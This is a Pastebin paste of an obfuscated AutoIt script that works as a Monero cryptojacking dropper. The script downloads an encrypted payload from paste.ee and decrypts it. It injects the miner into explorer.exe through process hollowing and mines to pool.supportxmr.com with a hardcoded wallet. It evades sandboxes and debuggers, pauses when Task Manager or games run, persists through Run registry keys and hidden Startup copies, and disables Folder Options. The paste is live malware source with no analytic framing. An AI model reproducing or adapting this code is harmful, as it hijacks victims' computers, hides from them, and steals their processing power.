Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #NoTrayIcon
- #Region
- #AutoIt3Wrapper_Compression=4
- #AutoIt3Wrapper_UseUpx=y
- #EndRegion
- FUNC _3(CONST $0=@ERROR,CONST $1=@EXTENDED)
- LOCAL $2=DLLCALL("kernel32.dll","dword","GetLastError")
- RETURN SETERROR($0,$1,$2[0])
- ENDFUNC
- GLOBAL CONST $3="struct;long Left;long Top;long Right;long Bottom;endstruct"
- GLOBAL CONST $4="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"&((@OSVERSION="WIN_XP")""";"&$3&";uint uChevronState")
- GLOBAL CONST $5="dword Length;ptr Descriptor;bool InheritHandle"
- GLOBAL CONST $6="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
- GLOBAL CONST $7=_1V()
- FUNC _1V()
- LOCAL $8=DLLSTRUCTCREATE($6)
- DLLSTRUCTSETDATA($8,1,DLLSTRUCTGETSIZE($8))
- LOCAL $9=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$8)
- IF @ERROR OR NOT $9[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($8,2),-8),DLLSTRUCTGETDATA($8,3))
- ENDFUNC
- FUNC _53($A,$B=TRUE )
- LOCAL $C=INETREAD($A,1)
- LOCAL $D=@ERROR,$E=@EXTENDED
- IF $B=DEFAULT OR $B THEN $C=BINARYTOSTRING($C)
- RETURN SETERROR($D,$E,$C)
- ENDFUNC
- GLOBAL CONST $F=-268435456
- GLOBAL $G[3]
- FUNC _5A()
- IF _5L()=0 THEN
- LOCAL $H=DLLOPEN("Advapi32.dll")
- IF $H=-1 THEN RETURN SETERROR(1001,0,FALSE )
- _5P($H)
- LOCAL $I=24
- LOCAL $9=DLLCALL(_5O(),"bool","CryptAcquireContext","handle*",0,"ptr",0,"ptr",0,"dword",$I,"dword",$F)
- IF @ERROR OR NOT $9[0]THEN
- LOCAL $D=@ERROR+1002,$E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- DLLCLOSE(_5O())
- RETURN SETERROR($D,$E,FALSE )
- ELSE
- _5R($9[1])
- ENDIF
- ENDIF
- _5M()
- RETURN TRUE
- ENDFUNC
- FUNC _5B()
- _5N()
- IF _5L()=0 THEN
- DLLCALL(_5O(),"bool","CryptReleaseContext","handle",_5Q(),"dword",0)
- DLLCLOSE(_5O())
- ENDIF
- ENDFUNC
- FUNC _5C($J,$K,$L=32771)
- LOCAL $9=0,$M=0,$N=0,$D=0,$E=0,$O=0
- _5A()
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
- DO
- $9=DLLCALL(_5O(),"bool","CryptCreateHash","handle",_5Q(),"uint",$L,"ptr",0,"dword",0,"handle*",0)
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+10
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $N=$9[5]
- $M=DLLSTRUCTCREATE("byte["&BINARYLEN($J)&"]")
- DLLSTRUCTSETDATA($M,1,$J)
- $9=DLLCALL(_5O(),"bool","CryptHashData","handle",$N,"struct*",$M,"dword",DLLSTRUCTGETSIZE($M),"dword",1)
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+20
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $9=DLLCALL(_5O(),"bool","CryptDeriveKey","handle",_5Q(),"uint",$K,"handle",$N,"dword",1,"handle*",0)
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+30
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $O=$9[5]
- UNTIL TRUE
- IF $N<>0 THEN DLLCALL(_5O(),"bool","CryptDestroyHash","handle",$N)
- RETURN SETERROR($D,$E,$O)
- ENDFUNC
- FUNC _5D($P)
- LOCAL $9=DLLCALL(_5O(),"bool","CryptDestroyKey","handle",$P)
- LOCAL $D=@ERROR,$E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- _5B()
- IF $D OR NOT $9[0]THEN
- RETURN SETERROR($D+10,$E,FALSE )
- ELSE
- RETURN TRUE
- ENDIF
- ENDFUNC
- FUNC _5F($Q,$R,$K,$S=TRUE )
- SWITCH $K
- CASE 0
- LOCAL $T=_5S($R)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
- IF $T=26625 THEN CONTINUECASE
- CASE 26625
- IF BINARYLEN($Q)=0 THEN RETURN SETERROR(0,0,BINARY(""))
- ENDSWITCH
- LOCAL $9=0,$M=0,$U=0,$D=0,$E=0,$V=0,$O=0
- _5A()
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
- DO
- IF $K<>0 THEN
- $R=_5C($R,$K)
- IF @ERROR THEN
- $D=@ERROR
- $E=@EXTENDED
- $O=-1
- EXITLOOP
- ENDIF
- ENDIF
- $M=DLLSTRUCTCREATE("byte["&BINARYLEN($Q)+1000&"]")
- IF BINARYLEN($Q)>0 THEN DLLSTRUCTSETDATA($M,1,$Q)
- $9=DLLCALL(_5O(),"bool","CryptDecrypt","handle",$R,"handle",0,"bool",$S,"dword",0,"struct*",$M,"dword*",BINARYLEN($Q))
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+70
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $V=$9[6]
- $U=DLLSTRUCTCREATE("byte["&$V+1&"]",DLLSTRUCTGETPTR($M))
- $O=BINARYMID(DLLSTRUCTGETDATA($U,1),1,$V)
- UNTIL TRUE
- IF $K<>0 THEN _5D($R)
- _5B()
- RETURN SETERROR($D,$E,$O)
- ENDFUNC
- FUNC _5L()
- RETURN $G[0]
- ENDFUNC
- FUNC _5M()
- $G[0]+=1
- ENDFUNC
- FUNC _5N()
- IF $G[0]>0 THEN $G[0]-=1
- ENDFUNC
- FUNC _5O()
- RETURN $G[1]
- ENDFUNC
- FUNC _5P($H)
- $G[1]=$H
- ENDFUNC
- FUNC _5Q()
- RETURN $G[2]
- ENDFUNC
- FUNC _5R($W)
- $G[2]=$W
- ENDFUNC
- FUNC _5S($R)
- LOCAL $X=DLLSTRUCTCREATE("uint")
- LOCAL $9=DLLCALL(_5O(),"bool","CryptGetKeyParam","handle",$R,"dword",7,"struct*",$X,"dword*",DLLSTRUCTGETSIZE($X),"dword",0)
- LOCAL $D=@ERROR,$E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- IF $D OR NOT $9[0]THEN
- RETURN SETERROR($D+80,$E,1)
- ELSE
- RETURN DLLSTRUCTGETDATA($X,1)
- ENDIF
- ENDFUNC
- FUNC _5U()
- LOCAL $Y=DLLSTRUCTCREATE("uint;dword")
- DLLSTRUCTSETDATA($Y,1,DLLSTRUCTGETSIZE($Y))
- LOCAL $2=DLLCALL("user32.dll","bool","GetLastInputInfo","struct*",$Y)
- IF @ERROR OR $2[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- LOCAL $0Z=DLLCALL("kernel32.dll","dword","GetTickCount")
- IF @ERROR OR NOT $2[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- LOCAL $10=$0Z[0]-DLLSTRUCTGETDATA($Y,2)
- IF $10<0 THEN RETURN SETEXTENDED(1,$0Z[0])
- RETURN $10
- ENDFUNC
- FUNC _66($11,$12=0)
- LOCAL CONST $13=183
- LOCAL CONST $14=1
- LOCAL $15=0
- IF BITAND($12,2)THEN
- LOCAL $16=DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
- LOCAL $9=DLLCALL("advapi32.dll","bool","InitializeSecurityDescriptor","struct*",$16,"dword",$14)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- IF $9[0]THEN
- $9=DLLCALL("advapi32.dll","bool","SetSecurityDescriptorDacl","struct*",$16,"bool",1,"ptr",0,"bool",0)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- IF $9[0]THEN
- $15=DLLSTRUCTCREATE($5)
- DLLSTRUCTSETDATA($15,1,DLLSTRUCTGETSIZE($15))
- DLLSTRUCTSETDATA($15,2,DLLSTRUCTGETPTR($16))
- DLLSTRUCTSETDATA($15,3,0)
- ENDIF
- ENDIF
- ENDIF
- LOCAL $17=DLLCALL("kernel32.dll","handle","CreateMutexW","struct*",$15,"bool",1,"wstr",$11)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- LOCAL $18=DLLCALL("kernel32.dll","dword","GetLastError")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- IF $18[0]=$13 THEN
- IF BITAND($12,1)THEN
- DLLCALL("kernel32.dll","bool","CloseHandle","handle",$17[0])
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- RETURN SETERROR($18[0],$18[0],0)
- ELSE
- EXIT -1
- ENDIF
- ENDIF
- RETURN $17[0]
- ENDFUNC
- _66("ixhost",1)
- $19="UpdateScheduler"
- GLOBAL $1A
- IF @OSARCH="X86" THEN
- $1A=@WINDOWSDIR&"\explorer.exe"
- ELSE
- $1A=@SYSTEMDIR&"\explorer.exe"
- ENDIF
- $1B="C:\Windows\System32\svchost.exe"
- $1C="pool.supportxmr.com:3333"
- $1D="42yzCwXHqAr2cbZ6kWU8SZJCq5H3quBAkgDd6ZZGKvvRYaPxKJ8J6GMVhGjo8pmgy74NRTvVst2ZGAk35ERgAS88NFHQQAV"
- $1E="-o "&$1C&" -u "&$1D&" -p x -k -t 1 --nicehash"
- $1F="-o "&$1C&" -u "&$1D&" -p x -k --max-cpu-usage=100 --nicehash"
- IF _66("ixkiller",1)=0 THEN
- IF PROCESSEXISTS(@SCRIPTNAME)THEN
- PROCESSCLOSE(@SCRIPTNAME)
- ENDIF
- ENDIF
- $1G=_53("https://paste.ee/r/LG8VC/0")
- $1H=_5F($1G,"ix32",26128)
- $1I=""
- _6E(1000)
- WHILE 1
- GUIGETMSG()
- _6F()
- _6D($19)
- _6C()
- WEND
- FUNC _6C()
- IF PROCESSEXISTS("SbieCtrl.exe")OR WINGETTEXT("Sanboxie Control")OR WINGETTEXT("PEiD")OR WINGETTEXT("ollydbg")OR WINGETTEXT("exetoaut")OR WINGETTEXT("myAutToExe")OR WINGETTEXT("Program Manager")THEN
- EXIT
- ENDIF
- ENDFUNC
- FUNC _6D($19)
- IF ISADMIN()=1 THEN
- IF FILEEXISTS(@WINDOWSDIR&"\"&@SCRIPTNAME)=FALSE THEN
- FILECOPY(@SCRIPTFULLPATH,@WINDOWSDIR&"\"&@SCRIPTNAME)
- ENDIF
- IF REGREAD("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
- REGWRITE("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@WINDOWSDIR&"\"&@SCRIPTNAME)
- ENDIF
- ELSE
- IF FILEEXISTS(@STARTUPDIR&"\"&@SCRIPTNAME)=FALSE THEN
- FILECOPY(@SCRIPTFULLPATH,@STARTUPDIR&"\"&@SCRIPTNAME)
- FILECOPY(@SCRIPTFULLPATH,@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
- ENDIF
- IF REGREAD("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
- REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@STARTUPDIR&"\"&@SCRIPTNAME)
- REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
- FILESETATTRIB(@STARTUPDIR&"\"&@SCRIPTNAME,"+SH")
- FILESETATTRIB(@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME,"+SH")
- REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1)
- REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
- ENDIF
- ENDIF
- ENDFUNC
- FUNC _6E($1J)
- LOCAL $1K=DLLCALL("kernel32.dll","dword","GetTickCount")
- SLEEP($1J)
- LOCAL $1L=DLLCALL("kernel32.dll","dword","GetTickCount")
- IF $1L[0]-$1K[0]=$1J THEN
- RETURN FALSE
- ELSE
- RETURN TRUE
- ENDIF
- ENDFUNC
- FUNC _6F()
- $1M=_5U()
- IF PROCESSEXISTS("Taskmgr.exe")OR PROCESSEXISTS("procexp.exe")OR PROCESSEXISTS("procexp64.exe")OR PROCESSEXISTS("procmon.exe")OR PROCESSEXISTS("FortniteClient-Win64-Shipping.exe")OR PROCESSEXISTS("bf1.exe")OR PROCESSEXISTS("bf4.exe")OR PROCESSEXISTS("bf4_x86.exe")OR PROCESSEXISTS("NFS16.exe")OR PROCESSEXISTS("NFS16_trial.exe")OR PROCESSEXISTS("Overwatch.exe")OR PROCESSEXISTS("csgo.exe")OR PROCESSEXISTS("argo.exe")OR PROCESSEXISTS("dota2.exe")OR PROCESSEXISTS("rust.exe")OR PROCESSEXISTS("argo_x64.exe")OR PROCESSEXISTS("arma3.exe")OR PROCESSEXISTS("arma3_x64.exe")OR PROCESSEXISTS("Creativerse.exe")OR PROCESSEXISTS("hl2.exe")OR PROCESSEXISTS("GTA5.exe")OR PROCESSEXISTS("insurgency.exe")OR PROCESSEXISTS("insurgency_64.exe")OR PROCESSEXISTS("paladins.exe")OR PROCESSEXISTS("TslGame.exe")OR PROCESSEXISTS("Unturned.exe")OR WINEXISTS("FIFA")THEN
- WINKILL($1A)
- SLEEP(10)
- ELSE
- IF $1M>50000 THEN
- IF NOT PROCESSEXISTS("madHcCtrl.exe")AND NOT PROCESSEXISTS("Sling.exe")THEN
- IF $1I="low" THEN
- WINKILL($1A)
- _6G($1H,$1F,$1A)
- SLEEP(5000)
- $1I="high"
- ELSEIF $1I="" THEN
- _6G($1H,$1F,$1A)
- SLEEP(5000)
- $1I="high"
- ENDIF
- ELSEIF $1I="high" THEN
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ELSEIF $1I="" THEN
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ENDIF
- ELSEIF $1I="high" THEN
- WINKILL($1A)
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ELSEIF $1I="" THEN
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ELSEIF NOT WINEXISTS($1A)THEN
- _6G($1H,$1E,$1A)
- SLEEP(3000)
- ENDIF
- ENDIF
- ENDFUNC
- FUNC _6G($1N,$1O=0,$1P=0)
- LOCAL $1Q=@AUTOITX64
- LOCAL $1R=BINARY($1N)
- LOCAL $1S=DLLSTRUCTCREATE("byte["&BINARYLEN($1R)&"]")
- DLLSTRUCTSETDATA($1S,1,$1R)
- LOCAL $1T=DLLSTRUCTGETPTR($1S)
- LOCAL $1U=DLLSTRUCTCREATE("dword cbSize;"&"ptr Reserved;"&"ptr Desktop;"&"ptr Title;"&"dword X;"&"dword Y;"&"dword XSize;"&"dword YSize;"&"dword XCountChars;"&"dword YCountChars;"&"dword FillAttribute;"&"dword Flags;"&"word ShowWindow;"&"word Reserved2;"&"ptr Reserved2;"&"ptr hStdInput;"&"ptr hStdOutput;"&"ptr hStdError")
- DLLSTRUCTSETDATA($1U,"Flags",1)
- DLLSTRUCTSETDATA($1U,"ShowWindow",@SW_HIDE)
- LOCAL $1V=DLLSTRUCTCREATE("ptr Process;"&"ptr Thread;"&"dword ProcessId;"&"dword ThreadId")
- IF $1O THEN $1O=$1P&" "&$1O
- LOCAL $1W=DLLCALL("kernel32.dll","bool","CreateProcessW","wstr",$1P,"wstr",$1O,"ptr",0,"ptr",0,"int",0,"dword",4,"ptr",0,"ptr",0,"ptr",DLLSTRUCTGETPTR($1U),"ptr",DLLSTRUCTGETPTR($1V))
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- LOCAL $1X=DLLSTRUCTGETDATA($1V,"Process")
- LOCAL $1Y=DLLSTRUCTGETDATA($1V,"Thread")
- IF $1Q AND _6M($1X)THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(2,0,0)
- ENDIF
- LOCAL $1Z,$20
- IF $1Q THEN
- IF @OSARCH="X64" THEN
- $1Z=2
- $20=DLLSTRUCTCREATE("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;"&"dword ContextFlags; dword MxCsr;"&"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;"&"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;"&"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;"&"uint64 Rip;"&"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];"&"uint64 VectorRegister[52]; uint64 VectorControl;"&"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
- ELSE
- $1Z=3
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(102,0,0)
- ENDIF
- ELSE
- $1Z=1
- $20=DLLSTRUCTCREATE("dword ContextFlags;"&"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;"&"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;"&"dword SegGs; dword SegFs; dword SegEs; dword SegDs;"&"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;"&"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;"&"byte ExtendedRegisters[512]")
- ENDIF
- LOCAL $21
- SWITCH $1Z
- CASE 1
- $21=65543
- CASE 2
- $21=1048583
- CASE 3
- $21=524327
- ENDSWITCH
- DLLSTRUCTSETDATA($20,"ContextFlags",$21)
- $1W=DLLCALL("kernel32.dll","bool","GetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(3,0,0)
- ENDIF
- LOCAL $22
- SWITCH $1Z
- CASE 1
- $22=DLLSTRUCTGETDATA($20,"Ebx")
- CASE 2
- $22=DLLSTRUCTGETDATA($20,"Rdx")
- CASE 3
- ENDSWITCH
- LOCAL $23=DLLSTRUCTCREATE("char Magic[2];"&"word BytesOnLastPage;"&"word Pages;"&"word Relocations;"&"word SizeofHeader;"&"word MinimumExtra;"&"word MaximumExtra;"&"word SS;"&"word SP;"&"word Checksum;"&"word IP;"&"word CS;"&"word Relocation;"&"word Overlay;"&"char Reserved[8];"&"word OEMIdentifier;"&"word OEMInformation;"&"char Reserved2[20];"&"dword AddressOfNewExeHeader",$1T)
- LOCAL $24=$1T
- $1T+=DLLSTRUCTGETDATA($23,"AddressOfNewExeHeader")
- LOCAL $25=DLLSTRUCTGETDATA($23,"Magic")
- IF NOT ($25=="MZ")THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(4,0,0)
- ENDIF
- LOCAL $26=DLLSTRUCTCREATE("dword Signature",$1T)
- $1T+=4
- IF DLLSTRUCTGETDATA($26,"Signature")<>17744 THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(5,0,0)
- ENDIF
- LOCAL $27=DLLSTRUCTCREATE("word Machine;"&"word NumberOfSections;"&"dword TimeDateStamp;"&"dword PointerToSymbolTable;"&"dword NumberOfSymbols;"&"word SizeOfOptionalHeader;"&"word Characteristics",$1T)
- LOCAL $28=DLLSTRUCTGETDATA($27,"NumberOfSections")
- $1T+=20
- LOCAL $29=DLLSTRUCTCREATE("word Magic;",$1T)
- LOCAL $2A=DLLSTRUCTGETDATA($29,1)
- LOCAL $2B
- IF $2A=267 THEN
- IF $1Q THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(6,0,0)
- ENDIF
- $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"dword BaseOfData;"&"dword ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"dword SizeOfStackReserve;"&"dword SizeOfStackCommit;"&"dword SizeOfHeapReserve;"&"dword SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
- $1T+=96
- ELSEIF $2A=523 THEN
- IF NOT $1Q THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(6,0,0)
- ENDIF
- $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"uint64 ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"uint64 SizeOfStackReserve;"&"uint64 SizeOfStackCommit;"&"uint64 SizeOfHeapReserve;"&"uint64 SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
- $1T+=112
- ELSE
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(6,0,0)
- ENDIF
- LOCAL $2C=DLLSTRUCTGETDATA($2B,"AddressOfEntryPoint")
- LOCAL $2D=DLLSTRUCTGETDATA($2B,"SizeOfHeaders")
- LOCAL $2E=DLLSTRUCTGETDATA($2B,"ImageBase")
- LOCAL $2F=DLLSTRUCTGETDATA($2B,"SizeOfImage")
- $1T+=8
- $1T+=8
- $1T+=24
- LOCAL $2G=DLLSTRUCTCREATE("dword VirtualAddress; dword Size",$1T)
- LOCAL $2H=DLLSTRUCTGETDATA($2G,"VirtualAddress")
- LOCAL $2I=DLLSTRUCTGETDATA($2G,"Size")
- LOCAL $2J
- IF $2H AND $2I THEN $2J=TRUE
- IF NOT $2J THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!"&@CRLF)
- $1T+=88
- LOCAL $2K
- LOCAL $2L
- IF $2J THEN
- $2L=_6K($1X,$2F)
- IF @ERROR THEN
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- _6L($1X,$2E)
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(101,1,0)
- ENDIF
- ENDIF
- ENDIF
- $2K=TRUE
- ELSE
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- _6L($1X,$2E)
- $2L=_6J($1X,$2E,$2F)
- IF @ERROR THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(101,0,0)
- ENDIF
- ENDIF
- ENDIF
- DLLSTRUCTSETDATA($2B,"ImageBase",$2L)
- LOCAL $2M=DLLSTRUCTCREATE("byte["&$2F&"]")
- LOCAL $2N=DLLSTRUCTGETPTR($2M)
- LOCAL $2O=DLLSTRUCTCREATE("byte["&$2D&"]",$24)
- DLLSTRUCTSETDATA($2M,1,DLLSTRUCTGETDATA($2O,1))
- LOCAL $2P
- LOCAL $2Q,$2R
- LOCAL $2S,$2T
- LOCAL $2U
- FOR $2V=1 TO $28
- $2P=DLLSTRUCTCREATE("char Name[8];"&"dword UnionOfVirtualSizeAndPhysicalAddress;"&"dword VirtualAddress;"&"dword SizeOfRawData;"&"dword PointerToRawData;"&"dword PointerToRelocations;"&"dword PointerToLinenumbers;"&"word NumberOfRelocations;"&"word NumberOfLinenumbers;"&"dword Characteristics",$1T)
- $2Q=DLLSTRUCTGETDATA($2P,"SizeOfRawData")
- $2R=$24+DLLSTRUCTGETDATA($2P,"PointerToRawData")
- $2S=DLLSTRUCTGETDATA($2P,"VirtualAddress")
- $2T=DLLSTRUCTGETDATA($2P,"UnionOfVirtualSizeAndPhysicalAddress")
- IF $2T AND $2T<$2Q THEN $2Q=$2T
- IF $2Q THEN
- DLLSTRUCTSETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2N+$2S),1,DLLSTRUCTGETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2R),1))
- ENDIF
- IF $2K THEN
- IF $2S<=$2H AND $2S+$2Q>$2H THEN
- $2U=DLLSTRUCTCREATE("byte["&$2I&"]",$2R+($2H-$2S))
- ENDIF
- ENDIF
- $1T+=40
- NEXT
- IF $2K THEN _6I($2N,$2U,$2L,$2E,$2A=523)
- $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$2L,"ptr",$2N,"dword_ptr",$2F,"dword_ptr*",0)
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(7,0,0)
- ENDIF
- LOCAL $2W=DLLSTRUCTCREATE("byte InheritedAddressSpace;"&"byte ReadImageFileExecOptions;"&"byte BeingDebugged;"&"byte Spare;"&"ptr Mutant;"&"ptr ImageBaseAddress;"&"ptr LoaderData;"&"ptr ProcessParameters;"&"ptr SubSystemData;"&"ptr ProcessHeap;"&"ptr FastPebLock;"&"ptr FastPebLockRoutine;"&"ptr FastPebUnlockRoutine;"&"dword EnvironmentUpdateCount;"&"ptr KernelCallbackTable;"&"ptr EventLogSection;"&"ptr EventLog;"&"ptr FreeList;"&"dword TlsExpansionCounter;"&"ptr TlsBitmap;"&"dword TlsBitmapBits[2];"&"ptr ReadOnlySharedMemoryBase;"&"ptr ReadOnlySharedMemoryHeap;"&"ptr ReadOnlyStaticServerData;"&"ptr AnsiCodePageData;"&"ptr OemCodePageData;"&"ptr UnicodeCaseTableData;"&"dword NumberOfProcessors;"&"dword NtGlobalFlag;"&"byte Spare2[4];"&"int64 CriticalSectionTimeout;"&"dword HeapSegmentReserve;"&"dword HeapSegmentCommit;"&"dword HeapDeCommitTotalFreeThreshold;"&"dword HeapDeCommitFreeBlockThreshold;"&"dword NumberOfHeaps;"&"dword MaximumNumberOfHeaps;"&"ptr ProcessHeaps;"&"ptr GdiSharedHandleTable;"&"ptr ProcessStarterHelper;"&"ptr GdiDCAttributeList;"&"ptr LoaderLock;"&"dword OSMajorVersion;"&"dword OSMinorVersion;"&"dword OSBuildNumber;"&"dword OSPlatformId;"&"dword ImageSubSystem;"&"dword ImageSubSystemMajorVersion;"&"dword ImageSubSystemMinorVersion;"&"dword GdiHandleBuffer[34];"&"dword PostProcessInitRoutine;"&"dword TlsExpansionBitmap;"&"byte TlsExpansionBitmapBits[128];"&"dword SessionId")
- $1W=DLLCALL("kernel32.dll","bool","ReadProcessMemory","ptr",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(8,0,0)
- ENDIF
- DLLSTRUCTSETDATA($2W,"ImageBaseAddress",$2L)
- $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
